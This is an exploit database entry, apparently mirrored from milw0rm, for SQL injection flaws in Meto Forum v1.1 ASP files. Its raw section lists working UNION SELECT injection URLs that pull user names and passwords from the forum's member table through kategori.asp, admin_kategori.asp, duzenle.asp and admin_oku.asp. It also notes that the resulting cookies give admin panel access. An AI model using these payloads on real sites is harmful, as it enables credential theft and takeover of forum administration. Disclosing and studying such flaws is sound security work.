Meto Forum v1.1 Multiple Remote SQL Injection Vulnerable

vendor:

Meto Forum v1.1

by:

Ugur Can Engin

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Meto Forum v1.1

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:meto_forum:meto_forum_v1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Meto Forum v1.1 Multiple Remote SQL Injection Vulnerable

Meto Forum v1.1 is vulnerable to multiple remote SQL injection attacks. Attackers can exploit this vulnerability to gain access to the admin panel and steal all user passwords. The vulnerable files are kategori.asp, admin_kategori.asp, duzenle.asp, admin_oku.asp, uye.asp, and oku.asp.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\
                                                        
Meto Forum v1.1 Multiple Remote SQL Ä°injectin Vulnerable  
                                                              
Script : http://www.aspindir.com/goster/5444               
                                                              
Risk   : Forum in All users saved password is to take.        
                                                              
Coded : Asp , SQL Language = 'Acces'                   
                                                             
-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-/


EÄ°P [1] Exploit:


http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test


Log in Admin Panel > cookie Saved , 
This Script file have SQL Ä°njectin atack. 


http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1  2,3,4,5,6


http://localhost:2222/lab/MetoForumV1/forum/admin/duzenle.asp?id=1+union+select+0,kullanici,parola,3,4,5,1+from+uyeler



http://localhost:2222/lab/MetoForumV1/forum/admin_oku.asp?id=1%20union%20select%200,1,2,3,4,5,1,6,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,7,8,9,1,1,1,1%20from%20uyeler



[ESP][2]

Other have sql injection atack file :

uye.asp 
oku.asp

-\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-



Discovered By U238 |Ugur Can Engin |

Web - Designer Developer Solutions

setuid.noexec0x1[at[hotmail[d0t]com

pgp key --> http://ugurcan.by.ru/U238.asc

Friends --> < Teyfik Cevik - ka0x - The_BekiR - Erhan Bulut - Caborz - Nettoxic - fahn - ZeberuS >

DunyanÄ±n En buyuk Ve En Zeki Lideri Olan  Mustafa Kemal Ataturk'u SelamlarÄ±m. 

# milw0rm.com [2008-05-13]